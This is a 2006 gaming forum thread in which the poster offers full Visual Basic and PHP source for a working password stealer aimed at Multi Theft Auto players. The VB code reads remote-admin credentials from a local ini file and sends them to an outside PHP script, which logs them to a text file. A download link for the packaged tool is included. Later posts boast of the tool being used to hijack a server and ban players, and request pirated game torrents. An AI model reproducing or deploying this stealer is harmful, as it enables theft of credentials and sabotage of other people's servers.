Posted January 30, 200619 yr this is a acual working stealer... i was gonna do it in C++ but it would have taken longer for me :facesj: VB Source Code: Private Declare Function GetPrivateProfileString Lib "kernel32" Alias "GetPrivateProfileStringA" (ByVal lpApplicationName As String, ByVal lpKeyName As Any, ByVal lpDefault As String, ByVal lpReturnedString As String, ByVal nSize As Long, ByVal lpFileName As String) As Long Public sapath As String 'get the stringy thingy Public password As String Public IP As String Public PORT As String Public drive As String Public inipath As String Public PathToPHP As String Private Sub Form_Load() PathToPHP = "http://massive-mapping.com/example/" GetSaPath drive = Left(sapath, 1) 'C? D? lolz inipath = drive & ":/mta.ini" ReadIniValues ReportToServer IP, PORT, password End Sub Public Function GetSaPath() Dim KeyPath As String KeyPath = "SOFTWARE\Multi Theft Auto: San Andreas" sapath = Trim(RegRead(KeyPath, "", HKEY_LOCAL_MACHINE)) End Function Public Function GetFromINI(Section As String, Key As String, Directory As String) As String Dim strBuffer As String strBuffer = String(750, Chr(0)) Key$ = LCase$(Key$) GetFromINI$ = Left(strBuffer, GetPrivateProfileString(Section$, ByVal Key$, "", strBuffer, Len(strBuffer), Directory$)) End Function Public Function ReadIniValues() IP = GetFromINI("Remote Admin", "IP", inipath) PORT = GetFromINI("Remote Admin", "Port", inipath) password = GetFromINI("Remote Admin", "Password", inipath) End Function Public Function ReportToServer(ip1 As String, port1 As String, pass As String) Inet1.OpenURL PathToPHP & "password.php?IP=" & ip1 & "&PORT=" & port1 & "&PASS=" & pass End Function PHP: <?php $ip = $_GET['IP']; $port = $_GET['PORT']; $password = $_GET['PASS']; function append_file($filename,$newdata) { $f=fopen($filename,"a"); fwrite($f,$newdata); fclose($f); } if ($password && $port && $ip) { append_file("passes.txt","\n IP: $ip \n Port: $port \n Password: $password \n ------------------------"); } ?> the module, again is in the Full Source code found here: http://www.massive-mapping.com/s0beit/coding/mta/stealer2/mtastealer.rar the exe, php file, and even the text file is included enjoy :o
January 30, 200619 yr how do you actually use such a thing? *never done something like that before and curious to learn*
January 30, 200619 yr kinda retarded, but i guess id be nice for people who load shit like this on bots
January 31, 200619 yr no I think its vice city.. They are still working on Multiplayer for san andreas last i checked
January 31, 200619 yr Author no I think its vice city.. They are still working on Multiplayer for san andreas last i checked http://light.mtavc.com for MTA BLUE SAN ANDREAS.
January 31, 200619 yr no I think its vice city.. They are still working on Multiplayer for san andreas last i checked there is a version for san andreas, but it is only races
February 3, 200619 yr well san andreas got pulled off the shelves again cause LA city is sueing or some shit.. anyone have a good torrent for GTA:SA? I can't find any healthy seeds.
February 3, 200619 yr Check ISOhunt for a torrent Also, this mod (which isn't released) looks much much better than MTA:SA http://sa-mp.com Check this video: http://files.gtanet.com/gtasa/files/videos/SA-MP.zip Now I'm bummed :/
February 3, 200619 yr Author a man known as Static used this to get ahold of a popular server password and started freezing and banning people at random. it was nice. :rape: